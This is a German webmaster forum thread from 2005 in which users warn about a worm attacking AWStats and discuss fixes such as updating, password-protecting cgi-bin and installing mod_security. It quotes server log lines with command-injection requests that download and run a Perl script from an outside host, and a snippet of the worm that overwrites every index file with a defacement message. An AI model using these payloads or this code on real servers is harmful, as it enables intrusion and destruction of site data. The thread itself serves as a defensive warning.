Seite 1 von 1
Hinweis: Hackversuche für AWSTATS
Verfasst: 09.03.2005, 10:52
von Pompom
Wir haben in den letzten Tagen vermehrt Zugriffe aus China von der IP: 61.135.136.137
Die von euch, die Awstats nutzen, sollten sich das genauer ansehen, denn plötzlich sind alle Index-Dateien wech.
Den Wurm gibt es als Quelltext derzeit unter:
https://www.krazyk9s.co.uk/spykids.txt
Logauszug:
61.135.136.137 - - [08/Mar/2005:23:24:29 +0100] "GET /awstats/awstats.pl%20target=_blan?configdir=%7Cecho%20;cd%20/tmp;curl%20-O%20www.krazyk9s.co.uk/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids.txt;%20wget%20www.krazyk9s.co.uk/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids.txt;echo%20;echo%7C HTTP/1.0" -" "LWP::Simple/5.53"
61.135.136.137 - - [08/Mar/2005:23:24:33 +0100] "GET /awstats/awstats.pl%20target=_blan?update=1&logfile=%7Cecho%20;cd%20/tmp;curl%20-O%20www.krazyk9s.co.uk/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids.txt;%20wget%20www.krazyk9s.co.uk/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids.txt;echo%20;echo%7C HTTP/1.0" - "LWP::Simple/5.53"
61.135.136.137 - - [08/Mar/2005:23:24:39 +0100] "GET /awstats/awstats.pl%20target=_blan?pluginmode=:system(%22cd%20/tmp;curl%20-O%20www.krazyk9s.co.uk/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids.txt;%20wget%20www.krazyk9s.co.uk/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids.txt%22); HTTP/1.0" -" "LWP::Simple/5.53"
Hinweis: Hackversuche für AWSTATS
Verfasst: 09.03.2005, 13:01
von Fruetel
Das musste kommen, eine Reihe von AwStats-Exploits wurde ja vor einigen Wochen veröffentlicht. Abhilfe schafft hier, neben dem obligatorischen Update, das CGI-Bin Verzeichnis per .htaccess mit einem Passwort zu schützen.
Gruss,
Thomas
Hinweis: Hackversuche für AWSTATS
Verfasst: 09.03.2005, 19:41
von Luckybuy3000
@ pompon
Welche Version von awstats benutzt du ? Dringend empfohlen ist das update auf die Version 6.3. oder 6.4
Hinweis: Hackversuche für AWSTATS
Verfasst: 09.03.2005, 22:43
von Pompom
Ich benutze gar keine
Aber die bösen Buben wollten auch die knacken.
Sie grasen scheinbar einfach an Hand einiger Keywords die bei google top-positionierten Seiten ab.
Hinweis: Hackversuche für AWSTATS
Verfasst: 09.03.2005, 23:27
von Luckybuy3000
Wie geht das denn ? Hab ich da etwa was verpasst ? Mit der config dir das ist schon lange bekannt und auch wie das gefixt wird falls jemand kein update von awstats auf die aktuellste Version durchführen kann.
Ist es denn empfehlenswert, die IP vorsorglich zu sperren ? Mein AWStats ist up to date.
Hinweis: Hackversuche für AWSTATS
Verfasst: 10.03.2005, 08:26
von SloMo
Ein Wurm pflanzt sich ja nunmal in ureigenster Bestimmung fort, kann also jederzeit von einer anderen IP kommen. Eine oder einige IPs zu sperren wird die Sicherheit nicht erhöhen.
Hinweis: Hackversuche für AWSTATS
Verfasst: 10.03.2005, 13:58
von mario
@pompom
hatten wir auch und zwar am 2.3.05, aber index-Dateien wurden keine gelöscht "nur" extremen Traffic verursacht... Es handelt sich um genau die von Dir erwähnte IP. Unser Server wurde einfach für 30 Stunden von der Schippe geworfen. Eine Analyse ergab dann, dass der "Eindringling" über das Sicherheitsloch bei AWstats reinkam und fleissig Traffic produzierte... Ein Update auf 6.4 zeigt Wirkung, bis jetzt jedenfalls... hier eine Kurze Beschreibung:
https://blogs.ittoolbox.com/security/in ... 003227.asp
Hinweis: Hackversuche für AWSTATS
Verfasst: 10.03.2005, 18:18
von Pompom
Mario,
dat war dann aber ein anders Script. Spätestens nach diesem Code aus dem
Quelltext
system("locate index.* >> index");
system("find / -name index.* >> index");
open(a,"<index");
@ind = <a>;
close(a);
$b = scalar(@ind);
for($a=0;$a<=$b;$a++){
chomp;
system("echo spykids ownz your server > $ind[$a]");
}
wären sonst alle index.*-Dateien mit folgendem Inhalt "spykids ownz your server" überschrieben.
Hinweis: Hackversuche für AWSTATS
Verfasst: 10.03.2005, 18:19
von Pompom
Hinweis: Hackversuche für AWSTATS
Verfasst: 10.03.2005, 18:31
von mario
ja es war ein anderes script und der Chinese hat's mehrfach versucht, aber nicht geschafft, aber ein Ööösi der uns bekannt ist kam dann schlussendlich rein...
Verfasst: 17.03.2005, 11:43
von mauri
habt ihr modsecurity installiert?
https://www.modsecurity.org/
versuche das gerade...
gruss
mauri
Hinweis: Hackversuche für AWSTATS
Verfasst: 21.12.2005, 19:09
von Pagemaker
@- Mario:
Wat is ein "AWstats"???????
Wenns Ihr schon mit den Chinesen habt, müßt Ihr deswegen nicht gleich chinesisch schwatzen.....
Gruß v. Andreas - "Pagemaker"
Re: Hinweis: Hackversuche für AWSTATS
Verfasst: 21.12.2005, 19:22
von mario
Pagemaker hat geschrieben:@- Mario:
Wat is ein "AWstats"???????
Wenns Ihr schon mit den Chinesen habt, müßt Ihr deswegen nicht gleich chinesisch schwatzen.....
Gruß v. Andreas - "Pagemaker"
ein Programm womit man "scharfe " Bilder produzieren kann
https://www.bflets.dyndns.org/Tools/AWStatsJpn.html
und so kannst Du das auf Deinem Server installieren
https://robert.boeck-horn.de/AWStats-In ... itung.html
liebe Grüsse aus dem Süden am kürzesten Tag des Jahres
Hinweis: Hackversuche für AWSTATS
Verfasst: 21.12.2005, 21:08
von Pagemaker
.
@- Mario:
Lieber Mario,
"scharfe" Bilder?
Huuuch, dann können alle Leute meine Gattin nackt auf der Page sehen?
Diese Bildschirmwixxxer!
Natürlich kapierte ich, daß das "stats" wat mit Statistik zu tun hat.
Aber, so genau brauche ich es nicht und kann herzlich gern darauf verzichten.
Mir reicht es zu wissen, daß soundsoviel Idioten auf der Page waren und nur dumm dreingegafft haben.
Was anderes wäre, dieses Programm vermeldet mir, wieviel Kohle die Leute in der Tasche und auf dem Konto haben und trotzdem nix kaufen.
Aber sicher würde ich nur bestätigt bekommen, was ich eh vermute........
Gruß v. Andreas - "Pagemaker"
.
